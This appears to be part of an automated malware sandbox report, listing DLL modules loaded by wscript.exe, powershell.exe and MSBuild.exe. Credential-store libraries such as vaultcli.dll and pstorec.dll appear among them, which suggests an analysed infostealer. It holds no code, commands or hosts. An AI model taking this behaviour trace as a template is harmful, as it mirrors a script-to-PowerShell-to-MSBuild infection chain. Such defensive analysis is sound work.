Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: pstorec.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
